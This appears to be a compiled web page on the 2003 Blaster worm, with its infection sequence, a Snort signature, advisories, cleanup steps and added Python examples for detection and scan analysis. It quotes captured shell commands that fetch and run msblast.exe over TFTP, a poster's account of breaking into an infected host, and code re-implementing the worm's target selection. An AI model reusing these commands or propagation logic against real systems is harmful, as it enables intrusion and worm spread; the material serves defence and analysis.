Softpanorama
May the source be with you, but remember the KISS principle ;-)
The Blaster worm uses a series of components to infect a host. The first component is a publicly available RPC DCOM exploit that binds a SYSTEM-level command shell to TCP port 4444. This exploit is used to open a command channel between the infecting agent and the vulnerable target. Once the target is compromised, the worm transmits the msblast.exe executable (the main body of the worm) to it via TFTP. The payload used in the public DCOM exploit, as well as the TFTP functionality, are both encapsulated within msblast.exe.
Existing RPC DCOM Snort signatures will detect this worm. The worm is based on dcom.c.
Infection sequence:
1. SOURCE sends packets to TCP port 135 of TARGET carrying a variant of the dcom.c exploit.
2. This leaves a remote shell listening on TCP port 4444 at the TARGET.
3. SOURCE connects to the shell on port 4444 and sends the tftp GET command to the TARGET.
4. TARGET connects back to the TFTP server at the SOURCE (UDP port 69), downloads msblast.exe and runs it.
The existing RPC/DCOM signature in the free Snort intrusion detection system will detect this worm as it enters a monitored network. Symantec provided another Snort signature, listed below (see their analysis report):
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 \
(msg:"DCE RPC Interface Buffer Overflow Exploit"; \
content:"|00 5C 00 5C|"; \
content:!"|5C|"; within:32; \
flow:to_server,established; \
reference:bugtraq,8205; rev: 1; )
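What this rule actually keys on, as an added example (Python written for this page, not Symantec's or Snort's code): the first content: is the byte pattern a UTF-16LE "\\" leaves behind when the byte before it is zero, and the negated content: with within:32 requires that no backslash follow in the next 32 bytes, i.e. a server-name component of at least 16 wide characters, longer than any legal NetBIOS name (15 characters). The matcher below reproduces just that content logic (flow: and the port test are left to the sensor) and runs it over constructed payloads: a normal UNC path, the overlong server name the public exploit sends, and a long DNS server name that shows the rule's false-positive side. The NDR string header placed in front of the path is a modelled layout, not a captured packet.

```python
"""Toy re-implementation of the content-matching logic of the Symantec Snort
rule above.  Written for this page as an added example; not Symantec's or
Snort's code.  Only the two content: options and the within: modifier are
modelled; flow:to_server,established and the 135/tcp port test are left to
the real sensor.  All payloads below are constructed, not captured."""
import struct

# content:"|00 5C 00 5C|" -- the bytes a UTF-16LE "\\" leaves in the stream when
# the byte before it (the high byte of the previous wide char, or the last byte
# of a length field) is zero.
FIRST_CONTENT = b"\x00\x5c\x00\x5c"
# content:!"|5C|"; within:32 -- no backslash byte in the 32 bytes after that match
NEGATED_CONTENT = b"\x5c"
WITHIN = 32


def rule_matches(payload: bytes) -> bool:
    """True if the two content: options of the rule match this TCP payload.

    Snort tries each occurrence of the first content in turn; the rule fires
    if, for any of them, the negated content is absent from the next WITHIN
    bytes.  Mirror that instead of stopping at the first occurrence.
    """
    start = 0
    while (i := payload.find(FIRST_CONTENT, start)) != -1:
        window_start = i + len(FIRST_CONTENT)
        window = payload[window_start:window_start + WITHIN]
        if NEGATED_CONTENT not in window:
            return True
        start = i + 1
    return False


def activation_path(server: str, rest: str = r"\c$\x.txt") -> bytes:
    """Constructed stand-in for the path argument of a DCOM activation request:
    an NDR conformant-varying string header (max count, offset, actual count,
    each a little-endian DWORD) followed by the UTF-16LE UNC path.  Only the
    layout that matters to the rule is reproduced; this is not a full DCOM PDU.
    """
    path = "\\\\" + server + rest
    n = len(path) + 1                      # wide characters including the NUL
    return struct.pack("<III", n, 0, n) + path.encode("utf-16-le") + b"\x00\x00"


# Constructed samples.
BENIGN = activation_path("FILESRV01")                       # legal 9-char NetBIOS name
OVERLONG = activation_path("A" * 64)                        # far beyond 15 chars
LONG_DNS = activation_path("fileserver.corp.example.com")   # legitimate, 27 chars


def classify(payload: bytes) -> str:
    """Human-readable verdict for a payload, for use at the command line."""
    return "ALERT" if rule_matches(payload) else "pass"


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("overlong", OVERLONG), ("long DNS", LONG_DNS)):
        print(f"{name:10s} {classify(sample)}")
```

The third sample is the caveat: a UNC path whose server part is a DNS name of 16 or more characters trips the rule just as the exploit does, so on networks where DCOM activation with FQDN paths is normal this signature needs a whitelist or a tighter anchor on the RPC request header.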
MS03-026 Scanning Tool: Microsoft has released a tool, KB823980scan.exe, that can be used to scan networks to identify host computers that do not have the 823980 security patch (MS03-026) installed.
For additional information about the security patch (MS03-026), please review Knowledge Base Article 823980 in the Microsoft Knowledge Base.
Sniffing my connection, I detected a new worm propagating via the RPC DCOM overflow.
I saw a couple of connections trying to connect to my port 4444, so I did a little listen on it:
---------
tftp -i 142.217.249.63 GET msblast.exe
tftp -i 142.217.242.78 GET msblast.exe
start msblast.exe
msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.247.115 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 142.217.254.164 GET msblast.exe
tftp -i 142.217.228.200 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i .... and it continues...
------------------------------
So I got into one of those computers with the RPC overflow and downloaded MSBLAST.exe.
I installed it.
It begins the scan at 108.41.62.1-255 on port 135,
and it puts itself into the registry to run at startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\windows auto update "msblast.exe"
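The capture above is the most useful artifact a port-4444 listener yields: the host named in each "tftp -i <ip> GET msblast.exe" line is the already infected machine running the TFTP server, so it is the upstream host to block and report. The following is an added example (Python written for this page, not the poster's tool or the worm's code) that turns such a capture into a list of infected sources and rejects malformed addresses. SAMPLE_CAPTURE is constructed for the example with documentation-range addresses; the listener at the end is a sink that records what the peer sends and nothing more.

```python
"""Added example, not from the post above: parse the command stream that a
listener bound to TCP 4444 receives from this worm and list the hosts it
names.  SAMPLE_CAPTURE is constructed for this example (192.0.2.0/24 is a
documentation range); the real worm's exact command set is as captured above."""
import ipaddress
import re
import socket
from collections import Counter

TFTP_CMD = re.compile(
    r"^\s*tftp\s+-i\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+get\s+(?P<file>\S+)\s*$",
    re.IGNORECASE,
)
RUN_CMD = re.compile(r"^\s*(?:start\s+)?msblast\.exe\s*$", re.IGNORECASE)

# Constructed stand-in for what the shell port received; the last line has a
# deliberately invalid octet to show the validation path.
SAMPLE_CAPTURE = """\
tftp -i 192.0.2.10 GET msblast.exe
tftp -i 192.0.2.20 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 192.0.2.10 GET msblast.exe
start msblast.exe
msblast.exe
tftp -i 999.0.2.1 GET msblast.exe
"""


def parse_shell_capture(text):
    """Return (sources, run_attempts, unparsed).

    sources maps (ip, file) -> number of times that pull was ordered,
    run_attempts counts 'start msblast.exe' / 'msblast.exe' lines, and
    unparsed keeps anything else (including malformed addresses) for review.
    """
    sources = Counter()
    run_attempts = 0
    unparsed = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = TFTP_CMD.match(line)
        if m:
            try:
                ip = ipaddress.ip_address(m["ip"])   # rejects octets above 255
            except ValueError:
                unparsed.append(line)
                continue
            sources[(str(ip), m["file"].lower())] += 1
            continue
        if RUN_CMD.match(line):
            run_attempts += 1
            continue
        unparsed.append(line)
    return sources, run_attempts, unparsed


def infected_hosts(text):
    """Distinct source IPs, most frequently named first."""
    sources, _, _ = parse_shell_capture(text)
    per_ip = Counter()
    for (ip, _file), n in sources.items():
        per_ip[ip] += n
    return [ip for ip, _ in per_ip.most_common()]


def capture_one_session(bind="0.0.0.0", port=4444, timeout=60.0):
    """Accept one connection on the worm's shell port and return (peer_ip, text)
    with whatever the peer sent before closing or going quiet.  Run this only on
    a decoy host: it is a sink that executes nothing."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind, port))
        srv.listen(1)
        srv.settimeout(timeout)
        conn, peer = srv.accept()
        chunks = []
        with conn:
            conn.settimeout(5.0)
            try:
                while data := conn.recv(4096):
                    chunks.append(data)
            except socket.timeout:
                pass
    return peer[0], b"".join(chunks).decode("latin-1")


if __name__ == "__main__":
    print("infected sources:", infected_hosts(SAMPLE_CAPTURE))
```

In live use, feed the text returned by capture_one_session into parse_shell_capture and compare the peer address with the address inside the tftp command: for this worm they are the same host, and a mismatch means something other than msblast.exe is on the line.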
The worm exploits the DCOM RPC vulnerability in Microsoft Windows described in Microsoft Security Bulletin MS03-026.
It is written in C using the LCC compiler. The worm is a Windows PE EXE file about 6 KB in size (compressed with UPX; 11 KB when decompressed). Lovesan downloads and attempts to run a file named msblast.exe.
The worm contains the following text:
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible? Stop making money and fix your software!!
Symptoms of Infection:
MSBLAST.Exe in the Windows system32 folder.
Error message: RPC service failure. This causes the system to reboot.
How the Worm Spreads
Lovesan registers itself in the autorun key so that it is launched every time the computer reboots:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
windows auto update="msblast.exe"
The worm then scans IP addresses, attempting to connect to 20 random IP addresses and infect any vulnerable machines. Lovesan sleeps for 1.8 seconds and scans the next 20 IP addresses. Lovesan scans IP addresses following one of the patterns below:
In 3 out of 5 cases Lovesan selects random base IP addresses (A.B.C.D) where D is equal to 0, while A, B and C are random numbers between 0 and 255.
In the remaining 2 out of 5 cases Lovesan scans the subnet and gets the local IP address of the infected machine, extracts values A and B from it and sets D to 0. Then the worm extracts the C value.
If C is less than or equal to 20, then Lovesan does not modify C. Thus, if the local IP address is 207.46.14.1 the worm will scan IP addresses starting from 207.46.14.0
If C is greater than 20, then Lovesan selects a random value between C-19 and C. Thus, if the IP address of the infected machine is 207.46.134.191 the worm will scan IP addresses 207.46.{115-134}.0
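The selection rules above, re-implemented as an added example (Python written for this page, not the worm's code) so the two branches can be checked against the worked cases in the text (207.46.14.1 gives 207.46.14.0; 207.46.134.191 gives one of 207.46.{115-134}.0). It assumes the scan walks upward from the chosen A.B.C.0 twenty addresses at a time, which is how the text's "starting from" is read here; the random source, the 1.8-second pause and the port-135 probe are injectable stand-ins, not reproductions of the worm's own.

```python
"""Added example, not the worm's code: the scan-target selection described
above.  Assumptions: the scan proceeds sequentially upward from the base
address; rng, sleep and probe are injected so the loop can be exercised
without touching the network."""
import ipaddress
import random
import time

BURST = 20          # addresses tried per burst
PAUSE = 1.8         # seconds between bursts


def pick_base(local_ip, rng=random):
    """Choose the A.B.C.0 the next scan starts from.

    3 of 5 runs: A, B, C random, D = 0.
    2 of 5 runs: A, B taken from the host's own address; C kept if <= 20,
    otherwise replaced by a random value in [C-19, C]; D = 0.
    """
    a, b, c, _ = (int(x) for x in local_ip.split("."))
    if rng.randrange(5) < 3:
        return (rng.randrange(256), rng.randrange(256), rng.randrange(256), 0)
    if c > 20:
        c = rng.randint(c - 19, c)
    return (a, b, c, 0)


def local_branch_bases(local_ip):
    """Every base the 'own subnet' branch can produce for this host: the set a
    defender should watch for scans from a given infected address."""
    a, b, c, _ = (int(x) for x in local_ip.split("."))
    lo = c if c <= 20 else c - 19
    return [(a, b, x, 0) for x in range(lo, c + 1)]


def bursts(base, count):
    """Yield `count` lists of BURST consecutive addresses, walking upward from
    base and wrapping at the top of the 32-bit space."""
    cur = int(ipaddress.IPv4Address("%d.%d.%d.%d" % base))
    for _ in range(count):
        burst = [str(ipaddress.IPv4Address((cur + k) & 0xFFFFFFFF)) for k in range(BURST)]
        cur = (cur + BURST) & 0xFFFFFFFF
        yield burst


def scan(local_ip, max_bursts, rng=random, sleep=time.sleep, probe=lambda ip: False):
    """Drive the loop: pick a base, probe BURST addresses, pause, repeat.

    probe(ip) stands in for the 135/tcp connect and exploit attempt and returns
    True when the host 'accepted'.  Returns the list of hits."""
    hits = []
    for burst in bursts(pick_base(local_ip, rng), max_bursts):
        hits.extend(ip for ip in burst if probe(ip))
        sleep(PAUSE)
    return hits


if __name__ == "__main__":
    print("bases reachable from 207.46.134.191 via the local branch:")
    for base in local_branch_bases("207.46.134.191"):
        print("  %d.%d.%d.%d" % base)
```

The local branch is what makes one infected host a good predictor of the next victims: for a host at A.B.C.x, any scan it launches from its own prefix starts in A.B.{C-19..C}.0, so those twenty /24s are where to look for port-135 connection bursts of twenty every 1.8 seconds.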
The worm sends a buffer-overrun request to vulnerable machines via TCP port 135. The exploit leaves a command shell listening on TCP port 4444 on the newly infected machine.
Lovesan connects to that shell and sends a 'tftp GET' command. The victim machine then contacts the TFTP server run by the already infected machine, downloads the worm from it and runs it. The victim machine is now also infected.
PSS Security Response Team Alert - New Worm: W32.Blaster.worm
SEVERITY: CRITICAL
DATE: Updated August 12, 2003
PRODUCTS AFFECTED: Windows XP, Windows 2000, Windows Server 2003, Windows NT 4.0, NT 4.0 Terminal Services Edition
WHAT IS IT?
The Microsoft Product Support Services Security Team is issuing this alert to inform customers about a new worm named W32.Blaster.Worm which is spreading in the wild. This virus is also known as W32/Lovsan.worm (McAfee), WORM_MSBLAST.A (Trend Micro) and Win32.Posa.Worm (Computer Associates). Best practices, such as applying security patch MS03-026, should prevent infection by this worm.
Date discovered: August 11, 2003. Customers who had previously applied the security patch MS03-026 are protected. To determine whether the virus is present on your machine, see the technical details below.
IMPACT OF ATTACK:
Spreads through open RPC ports. The customer's machine reboots, or the file "msblast.exe" exists on the customer's system.
TECHNICAL DETAILS:
This worm scans a random IP range to look for vulnerable systems on TCP port 135. The worm attempts to exploit the DCOM RPC vulnerability patched by MS03-026.
Once the exploit code has been sent to a system, that system downloads and executes the file MSBLAST.EXE from the attacking system via TFTP. Once run, the worm creates the registry value: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe
The worm body also contains the text: I just want to say LOVE YOU SAN!! bill
Symptoms of the virus: Some customers may not notice any symptoms at all. A typical symptom is that the system reboots every few minutes without user input. Customers may also see:
- Presence of unusual TFTP* files
- Presence of the file msblast.exe in the WINDOWS SYSTEM32 directory
To detect this virus, search for msblast.exe in the WINDOWS SYSTEM32 directory, or download the latest anti-virus signatures from your anti-virus vendor and scan your machine.
For additional information on recovering from this attack please contact your preferred anti-virus vendor.
RECOVERY:
Many antivirus companies have written tools to remove this particular worm. To download the removal tool from your antivirus vendor, follow the procedures outlined below.
For Windows XP
First, enable the built in firewall such as Internet Connection Firewall (ICF) in Windows XP: http://support.microsoft.com/?id=283673
--In Control Panel, double-click "Networking and Internet Connections", and then click "Network Connections".
--Right-click the connection on which you would like to enable ICF, and then click "Properties".
--On the Advanced tab, click the box to select the option to “Protect my computer or network”.
Second, download the MS03-026 security patch from Microsoft:
Windows XP (32 bit)
Windows XP (64 bit)
Third, install or update your antivirus signature software
Then, download the worm removal tool from your antivirus vendor.
For Windows 2000 systems, where Internet Connection Firewall (ICF) is not available, the following steps will help block the affected ports so that the system can be patched. These steps are based on a modified excerpt from the article HOW TO: Configure TCP/IP Filtering in Windows 2000: http://support.microsoft.com/?id=309798
1. Configure TCP/IP security on Windows 2000:
--Select "Network and Dial-up Connections" in the control panel.
--Right-click the interface you use to access the Internet, and then click "Properties".
--In the "Components checked are used by this connection" box, click "Internet Protocol (TCP/IP)", and then click "Properties".
--In the Internet Protocol (TCP/IP) Properties dialog box, click "Advanced".
--Click the "Options" tab.
--Click "TCP/IP filtering", and then click "Properties".
--Select the "Enable TCP/IP Filtering (All adapters)" check box.
--There are three columns with the following labels:
TCP Ports
UDP Ports
IP Protocols
--In each column, you must select the "Permit Only" option.
--Click OK.
2. Download the MS03-026 security patch for Windows 2000 from Microsoft at: http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe
3. Install or update your antivirus signature software
4. Then, download the worm removal tool from your antivirus vendor.
For additional details on this worm from anti-virus software vendors participating in the Microsoft Virus Information Alliance (VIA) please visit the following links:
Please contact your Antivirus Vendor for additional details on this virus.
PREVENTION:
Turn on Internet Connection Firewall (Windows XP or Windows Server 2003) or use a third-party firewall to block TCP ports 135, 139, 445 and 593; UDP ports 135, 137 and 138; and also UDP port 69 (TFTP) and TCP port 4444 (the remote command shell). To enable the Internet Connection Firewall in Windows: http://support.microsoft.com/?id=283673
- In Control Panel, double-click Networking and Internet Connections, and then click Network Connections.
- Right-click the connection on which you would like to enable ICF, and then click Properties.
- On the Advanced tab, click the box to select the option to Protect my computer or network.
This worm utilizes a previously-announced vulnerability as part of its infection method. Because of this, customers must ensure that their computers are patched for the vulnerability that is identified in Microsoft Security Bulletin MS03-026. http://www.microsoft.com/technet/security/bulletin/MS03-026.asp.
Install the patch MS03-026 from Windows Update:
Windows NT 4 Server & Workstation
http://download.microsoft.com/download/6/5/1/651c3333-4892-431f-ae93-bf8718d29e1a/Q823980i.EXE
Windows NT 4 Terminal Server Edition
http://download.microsoft.com/download/4/6/c/46c9c414-19ea-4268-a430-53722188d489/Q823980i.EXE
Windows 2000
Windows XP (32 bit)
Windows XP (64 bit)
Windows 2003 (32 bit)
Windows 2003 (64 bit)
As always, please make sure to use the latest Anti-Virus detection from your Anti-Virus vendor to detect new viruses and their variants.
RELATED KB'S:
http://support.microsoft.com/?kbid=826955
RELATED MICROSOFT SECURITY BULLETINS:
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
RELATED LINKS:
http://www.microsoft.com/security/incident/blast.asp
If you have any questions regarding this alert please contact your Microsoft representative or 1-866-727-2338 (1-866-PCSafety) within the US; outside of the US please contact your local Microsoft Subsidiary.
PSS Security Response Team
CERT Advisory CA-2003-20 W32/Blaster worm
Microsoft RPC Exploit and W32.Blaster.Worm
Network Associates:
http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=100547
Trend Micro:
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Symantec:
http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
Computer Associates:
http://www3.ca.com/virusinfo/virus.aspx?ID=36265
For more information on Microsoft’s Virus Information Alliance please visit
this link:
http://www.microsoft.com/technet/security/virus/via.asp
1. Delete the registry value found under:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: "windows auto update"
String: "msblast.exe"
2. Look for "msblast.exe" running in Task Manager. If it is running, kill the process.
3. Delete the file "msblast.exe" found at %systemroot%\system32\msblast.exe
You can also use a free clean-up tool provided by Symantec.
Shavlik Technologies also provides a free version of its HFNetChk Lite software, which can scan your entire network for missing Microsoft patches and automate patch installation for up to 50 systems.
Tobias E. Schmidt of Winona University posted two Visual Basic scripts that can be used to help control the worm while patches are rolled out and to help clean up infected systems. The scripts can be inserted into computer startup and user logon sequences using Group Policy.
The number of target systems scanned for an open port 135, which the worm uses to spread, has been considerably higher since Microsoft released its security bulletin on July 16. Trends reveal that since that time the number of hosts performing scans has increased dramatically. Where before July 16 there were roughly 900 to 1100 systems scanning for port 135, as of August 11 there were over 58,900 systems performing scans, many of which are probably systems infected with the new worm.
To monitor the situation be sure to visit Incidents.org or Dshield.org regularly, where you can learn more about the worm, as well as about general trends and patterns of many different intrusion attempts.
On Monday, a few minutes after news of the new worm spread to the Bugtraq mailing list, an anonymous user with a Hotmail e-mail address posted a message to the list containing a link to another set of exploit code for the RPC/DCOM problem. The zip file contains a copy of the code, a compiled executable, and a macro file that can be used once the exploit inserts a backdoor command shell into an infected system. The code, called KaHT II, is capable of spreading itself to other systems rapidly.
You can also read more about the RPC/DCOM vulnerability in other articles on our Web site, and find links to Snort and its accessories in the list below:
Buffer Overrun In RPC Interface Could Allow Code Execution
More technical details, how to defend your systems, and user reports regarding patch installation issues:
UPDATE: MS Patches Leave Systems Insecure and Break Services
Commentary and other details:
Are You Vulnerable to RPC Exploitation?
Commentary and other details:
The RPC/DCOM Bugs: How Bad Are They?
Snort IDS - Win32 Version; and IDSCenter (GUI for Snort)
Download Snort for Win32 platforms
Download IDSCenter (from Engage Security)
Download the latest Snort Rulesets
Read Windows & .NET Magazine articles about Snort
Copyright © 1996-2009 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author free time. Submit comments This document is an industrial compilation designed and created exclusively for educational use and is placed under the copyright of the Open Content License(OPL). Site uses AdSense so you need to be aware of Google privacy policy. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
Last modified: June 02, 2008